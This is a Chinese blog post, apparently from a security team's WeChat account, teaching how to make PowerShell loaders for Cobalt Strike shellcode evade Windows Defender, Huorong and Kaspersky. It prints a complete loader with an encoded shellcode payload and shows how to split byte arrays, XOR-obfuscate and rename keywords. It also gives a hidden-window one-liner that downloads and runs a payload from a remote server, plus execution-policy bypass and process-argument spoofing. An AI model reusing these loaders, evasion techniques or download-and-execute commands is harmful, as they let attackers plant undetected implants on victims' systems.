技术交流

关注微信公众号 Z20安全团队 , 回复加群，拉你入群一起讨论技术。

直接公众号文章复制过来的，排版可能有点乱，可以去公众号看。

powershell执行策略修改

1 获取 PowerShell当前执行策略

 Get-ExecutionPolicy

windows默认配置为Restricted

2 设置执行策略

 Set-ExecutionPolicy unrestricted

PowerShell通过对安全做过充分考量的，它把脚本的执行分成了几个策略。

下面是4种常用的执行策略(XXX)：

Restricted：

禁止运行任何脚本和配置文件。

AllSigned：

可以运行脚本，但要求所有脚本和配置文件由可信发布者签名，包括在本地计算机上编写的脚本。

RemoteSigned：

可以运行脚本，但要求从网络上下载的脚本和配置文件由可信发布者签名；不要求对已经运行和已在本地计算机编写的脚本进行数字签名。

Unrestricted：

可以运行未签名脚本。

powershell 混淆免杀

总述：主要是分析代码，转换编码，然后去掉关键字特征。

注意：defender杀的是下面的for那一行，直接把for中的变量$x，换成别的，以下是换成了$gg，同时要把生成的字节数组拆开，再合并，直接一个数组已经不行了。for循环那个，只要每次利用现改变量名，就可以绕过defender。

本地马免杀

1.CS生成ps1

生成payload 或者无状态stageless的都可以，但是stageless的太大了，payload太长转换的时候会卡住，故本文采用的是生成payload的方式。

Set-StrictMode -Version 2  $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) }  function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] )  $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')  return $var_type_builder.CreateType() }  [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+EuNJY5czSyMzIyNL3NwkI0kjS3uHcMbc9qDjY6rkcxLjk1OXSnNLR01QQndLb1QFJNz2mEIjIyPIWHuq5aDMY9+aYyMjI9CHqtugy2Njo9hZXRGYQiMjI6s7Y6g7YKs7o9hZXTmYQiMjI6s7Y6g7YKs7o9hZXSSYQiMjI6s7a2uYQiMjI6s7qtCq5Xd4oMgncEkjcEkjS2shIyNJM3NLSeq/6tz2puNWcqrTa5AjqztjqBPIU8uj3NzcI0JCQg1QV0JERg0SEhAREREVGg1NUBINRUpXQExOTQ1ATE4jwi3l+0Po7OXaJ05aGZj3Wg5Z+j031+ZsWpFVQarTa6grYqsro9p8XSRL05aBddz2S8swIyNLZ9MWw9z2qtOoK6roygDc3Nyk2XyoZDug2yJWGqDkP6gcpP2q3ahfBysS6pLc0Id0dHRgpNlxdHCiydwjIyNxS9cjre/c9nh8eR7cIyMjXyTK/N3c3Kr0ouQjIyMj3MQxF3Vb')  for ($gg = 0; $gg -lt $var_code.Count; $gg++) { $var_code[$gg] = $var_code[$gg] -bxor 35 }  $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)  $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void]))) $var_runme.Invoke([IntPtr]::Zero) '@  If ([IntPtr]::size -eq 8) { start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job } else { IEX $DoIt }

2.寻找查杀特征

fuzz之后发现把“FromBase64String”删掉就不杀了，那就换掉“FromBase64String”

alert：

bypass：

可以发现是base64解密函数被标记为特征了，然后仔细看源码可以发现马也是将base64加密的payload去强制转换成byte数组。

那我们直接给他转换成byte数组

$string = ''$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('cs生成的shellcode')$s |foreach{ $string = $string + $_.ToString()+','}# 或者$string 短的话直接查看即可$string > 1.txt

最后为了方便写了个脚本实现自动化，贴入cs 的payload的就可以，可以结果会输出到当前目录下的result.txt中。

脚本文末自取

3. 把[Byte[]]$var_code替换掉

生成byte数组后，将对应位置换掉

 [Byte[]]$var_code = [Byte[]](xx,xx,xx,xx)  [Byte[]]$acode = [Byte[]](这里放刚刚转码后的FromBase65String)

其他地方不变。

此时最主要的一部分修改完了。

4.改一些关键字，数组分片

到第三步可以一部分免杀，为了进一步免杀，我们去混淆关键字。

把函数名和变量前缀var_ 随机化，还有最后的IEX改了一下。

对比截图-源文件(已经做了第三步的免杀了)

对比截图-第四步修改关键词之后的文件

可以直接把第三步替换的那一行替换掉这个代码中对应行。

数组分片

注意：defender杀的是下面的for那一行，直接把for中的变量$x，换成别的，以下是换成了$gg，同时要把生成的字节数组拆开，再合并，可以进行变量随机化拆分，加上异或混淆，直接一个数组已经不行了。实测隔个几个小时defender就有杀了，可能会传到云上查杀，改成别的变量名就没事了，所以后面写了个自动化工具。

Set-StrictMode -Version 2  $DoIt = @' function func_b { Param ($amodule, $aprocedure) $aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods') $agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure)) }  function func_a { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters, [Parameter(Position = 1)] [Type] $areturn_type = [Void] )  $atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed') $atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')  return $atype_b.CreateType() }  [Byte[]]$a1 = [Byte[]](转码后的byte数组片段) [Byte[]]$a2 = [Byte[]](转码后的byte数组片段) [Byte[]]$a3 = [Byte[]](转码后的byte数组片段) [Byte[]]$a4 = [Byte[]](转码后的byte数组片段) [Byte[]]$a5 = [Byte[]](转码后的byte数组片段) [Byte[]]$acode = $a1+$a2+$a3+$a4+$a5  for ($gg = 0; $gg -lt $acode.Count; $gg++) { $acode[$gg] = $acode[$gg] -bxor 35 }  $ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) $abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)  $arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void]))) $arunme.Invoke([IntPtr]::Zero) '@  If ([IntPtr]::size -eq 8) { start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job } else { i`ex $DoIt }

5.执行

Bypass执行策略绕过

 powershell -ExecutionPolicy bypass -File .\payload.ps1

执行命令，卡巴斯基会拦截，argue污染以下就行了。

 beacon> argue cmd.exe asdsdadsadsasadasd beacon> argue #查看污染的参数

无落地powershell免杀

总述：有了上面的思路我们来修改一下powershell一句话的木马，对其进行分析然后免杀。

原理：cs生成txt-shellcode代码，放到服务器web目录，然后目标执行powershell命令请求下载并执行。对于内容就是换一种编码来混淆，同时可以将编码部分分成几个部分然后再拼接，对于关键命令，可以使用Replace替换的方法。对于访问shellcode文件并执行的命令，可以采用混淆分割合并和Replace替换的方法绕过。

1.生成无落地执行powershell文件

2.访问http://xxx.xx.xxx.xx:80/a这个连接看看文件内容，并保存下来

通过分析可以看到代码实际组成是：

 $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("shellcode代码"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

3.使用方法1中的步骤2，把base64编码方式去掉，然后换成byte数组。

 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('cs生成的shellcode') $s |foreach { $string = $string + $_.ToString()+','} # 或者$string 短的话直接查看即可 $string > c:\1.txt 。

同样可以用上面的步骤2中脚本实现自动化

脚本文末自取

4.将生成的编码分成两块或者多块再组合

两块不够可以分成多块。

[Byte[]]$var_c1 = [Byte[]](31,139,8,0,0,0,0,0,0,0,173,87,109,111,162,218,22,254,92,127,5,31,154,168,169,181,40,214,234,220,76,114,20,65,80,160,10,190,247,52,205,6,182,136,34,32,108,4,60,51,255,253,44,80,123,58,119,58,247,78,114,175,9,113,179,89,175,207,126,214,98,161,97,114,175,145,192,54,136,236,153,152,186,159,225,32,180,61,151,170,23,10,183,61,79,36,212,87,234,143,98,97,29,185,6,201,182,179,197,155,133,201,155,31,120,198,27,50,205,0,135,33,245,87,225,102,132,2,180,167,74,183,71,20,188,237,61,51,114,112,133,202,111,50,187,110,247,28,92,199,128,115,15,33,42,160,68,249)[Byte[]]$var_c2 = [Byte[]](199,96,206,103,88,42,138,174,140,247,128,223,249,30,104,122,187,134,50,195,87,233,75,105,165,87,239,217,125,198,101,214,65,97,88,161,70,17,212,185,81,161,52,140,28,108,86,168,142,27,218,151,71,157,136,120,249,178,248,79,184,114,228,16,219,64,33,185,154,123,45,127,2,233,197,53,235,185,80,49,145,1,189,155,171,100,3,217,135,72,62,122,114,114,79,229,11,250,65,228,238,241,255,241,0,126,112,250,223,161,205,192,203,103,186,119,232,242,128,62,199,171,40,254,81,40,136,107,234,195,126,104,159,224,139,5,31,168,86,206,189,144,160,128,220,111,61,29,62,111,242,247,117,233,22,149,41,145,91,80,183,136,250,78,221,67,122,157,144,169,195,55,78,96,69,217,203,155,58,127,178,125,163,98,100,159,21,191,81,42,54,48,140,220,247,3,79,7,150,98,152,193,50,211,185,145,76,24,246,254,6,195,245,1,82,3,14,0,0)$var_code=$var_c1+$var_c2$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

5.另存到服务器的其他txt文件中并访问执行

 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:4545/text.txt'))"

此时www.virustotal.com还有几个被查出，主要是命令关键词没有被替换，使用混淆的方法解决。

6.混淆命令关键词并执行

 [Byte[]]$var_c1 = [Byte[]](31,42,160,68,249) [Byte[]]$var_c2 = [Byte[]](199,96,82,3,14,0,0) $var_code=$var_c1+$var_c2  $s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)

混淆-自动化

为了实现实战中快速应用，将免杀过程进行了自动化，并进行随机化处理，异或混淆，每次生成的payload都不相同，极大的提高渗透实战中的效率。

测试截图：

工具放到了星球，感兴趣的可以加入Z2O安全团队知识星球获取。

获取base64Tobyte.ps1：

https://github.com/komomon/Powershell_bypassAV

总结

一些思路

在powershell的免杀上，函数变量名需要一些混淆才能很好绕过，同样存在一个问题，如果每次执行的随机串长度固定，那么也存在被杀的可能性，所以随机化很重要。

可以再转化一下函数或代码顺序，加入一些无用载荷，比如一张图片拼接到payload中，提取有用部分，类似分片再拼接，这样效果会更好。

文章的想法是想让大家了解其中原理，形成自己的自定义免杀思路。

最后

感兴趣的小伙伴可以关注公众号回复“加群”，添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

Powershell 免杀过 defender 火绒，附自动化工具相关推荐

2023最新使用python进行shellcode免杀过360火绒，反虚拟机
本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群群文件中QQ群:798134185 反虚拟机方案根据虚拟机系统文件 cpu核心数开机启动时间 c盘大小判断生成c语言的payloa ...
老树开新花之shellcode_launcher免杀Windows Defender
微信公众号:乌鸦安全扫取二维码获取更多信息! 免杀效果静态免杀动态免杀效果(指的是可执行命令) 1. 准备条件本文中的免杀方式在我写完文章之后,免杀基本已经失效,毕竟是见光死,所以仅供各位师傅 ...
艰难的mimikatz源码编译免杀 Windows Defender
微信公众号:乌鸦安全扫取二维码获取更多信息! 说明本文周一的时候,工具就已经上传GitHub了,所以工具应该是已经失效了!!!仅供参考! 本文mimikatz源码编译未能免杀Windows Def ...
powershell免杀可替换的关键字
powershell免杀可替换的关键字关键字可替换 IEX $DoIt -- i`ex $DoIt IEX $a -- ie`x $a $var_runme -- $vrunme $var_buff ...
怎样找到ant压缩这个软件_彻底查杀广告软件！火绒，赞！
昨天下午,火绒的官方微博火绒安全实验室发布了一篇名为<火绒将彻底查杀广告软件首批包括50余款>的头条文章,在文章的开篇就指出对 50 余款恶意广告软件彻底查杀,评论区的朋友也是纷纷拍手称 ...
Powershell免杀系列（二）
技术交流关注微信公众号 Z20安全团队 , 回复加群 ,拉你入群一起讨论技术. 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看. 正文 powershell的免杀⽅法有很多,对代码进 ...
pyinstaller打包逆向分析，顺便免杀Windows Defender
微信公众号:乌鸦安全扫取二维码获取更多信息! 1. python3利用shellcode免杀火绒 1.1 什么是shellcode 在攻击中,shellcode是一段用于利用软件漏洞的有效负载,sh ...
记一次PowerShell免杀实战
最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家. 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Win ...
Powershell免杀
目录 Something u have to know: 0x01 调用混淆 0x02 别名混淆 0x03 转义符混淆 0x04 拆分混淆 0x05 编码混淆 0x06 shellcode内容差分混淆 ...

Powershell 免杀过 defender 火绒，附自动化工具

技术交流

获取base64Tobyte.ps1：

https://github.com/komomon/Powershell_bypassAV

Powershell 免杀过 defender 火绒，附自动化工具相关推荐

最新文章

热门文章